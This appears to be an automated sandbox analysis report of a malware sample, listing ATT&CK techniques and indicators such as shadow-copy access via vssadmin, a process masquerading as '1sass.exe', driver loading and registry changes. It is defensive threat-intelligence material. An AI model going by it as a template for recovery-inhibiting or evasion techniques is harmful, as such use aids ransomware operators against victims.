Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nc123.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	1sass.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wevtutil.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	Process not Found

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
7428	cmd.exe
6796	PING.EXE

System Time Discovery 1 TTPs 1 IoCs

Adversary may gather the system time and/or time zone settings from a local or remote system.

discovery

System Time Discovery

T1124

pid	Process
3164	wevtutil.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE

Enumerates system info in registry 2 TTPs 9 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE

Interacts with shadow copies 3 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

Direct Volume Access

T1006

pid	Process
11172	vssadmin.exe
6596	vssadmin.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133856681605938755"	chrome.exe

Modifies registry class 31 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\FLAGS\ = "0"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	msedge.exe
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	7zG.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\UnLockerMenu	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\UnLockerMenu	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	7zG.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\PfShellExtension.DLL\AppID = "{59A55EF0-525F-4276-AB62-8F7E5F230399}"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\ = "PfShellExtension 1.0 Type Library"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu\ = "{410BF280-86EF-4E0F-8279-EC5848546AD3}"	Process not Found
Key created	\REGISTRY\USER\S-1-5-21-2593460650-190333679-3676257533-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399}\ = "PfShellExtension"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\ = "UnLockerMenu Class"	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{410BF280-86EF-4E0F-8279-EC5848546AD3}\InprocServer32\ThreadingModel = "Apartment"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\UnLockerMenu	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\HELPDIR\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker"	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\AppID\{59A55EF0-525F-4276-AB62-8F7E5F230399}	Process not Found
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0	Process not Found
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{F844CB30-D8B9-4AA5-8B0D-B2229285B4AE}\1.0\0\win64\ = "C:\\Program Files (x86)\\IObit\\IObit Unlocker\\IObitUnlockerExtension.dll"	Process not Found

Modifies registry key 1 TTPs 3 IoCs

Modify Registry

T1112

pid	Process
11788	Process not Found
2376	Process not Found
8552	Process not Found

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
6796	PING.EXE

Suspicious behavior: AddClipboardFormatListener 2 IoCs

pid	Process
2068	WINWORD.EXE
2068	WINWORD.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4252	msedge.exe
4252	msedge.exe
3168	msedge.exe
3168	msedge.exe
1848	identity_helper.exe
1848	identity_helper.exe
5572	chrome.exe
5572	chrome.exe
5440	msedge.exe
5440	msedge.exe
5440	msedge.exe
5440	msedge.exe
5152	msedge.exe
5152	msedge.exe
5624	chrome.exe
5624	chrome.exe
5624	chrome.exe
5624	chrome.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
7752	unlocker.tmp
7752	unlocker.tmp
3036	1sass.exe
3036	1sass.exe
8080	loader.exe
8080	loader.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe
3036	1sass.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
4868	7zG.exe
6484	MouseLock.exe

Suspicious behavior: LoadsDriver 33 IoCs

pid	Process
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
3904	mssql.exe
660	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 43 IoCs

pid	Process
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe
Token: SeShutdownPrivilege	5572	chrome.exe
Token: SeCreatePagefilePrivilege	5572	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
5572	chrome.exe
6172	SearchHost.exe
8080	loader.exe
8080	loader.exe
8080	loader.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe
3168	msedge.exe

Suspicious use of SetWindowsHookEx 25 IoCs

pid	Process
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
2068	WINWORD.EXE
3684	mssql2.exe
3904	mssql.exe
3684	mssql2.exe
3904	mssql.exe
6172	SearchHost.exe
3904	mssql.exe
10600	Process not Found
10600	Process not Found
10600	Process not Found
10600	Process not Found
9524	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3168 wrote to memory of 2072	3168	msedge.exe	85
PID 3168 wrote to memory of 2072	3168	msedge.exe	85
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 208	3168	msedge.exe	86
PID 3168 wrote to memory of 4252	3168	msedge.exe	87
PID 3168 wrote to memory of 4252	3168	msedge.exe	87
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88
PID 3168 wrote to memory of 4892	3168	msedge.exe	88

System policy modification 1 TTPs 1 IoCs

defense_evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\DataCollection	Process not Found

Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument http://melbet.com
1⤵
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3168
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
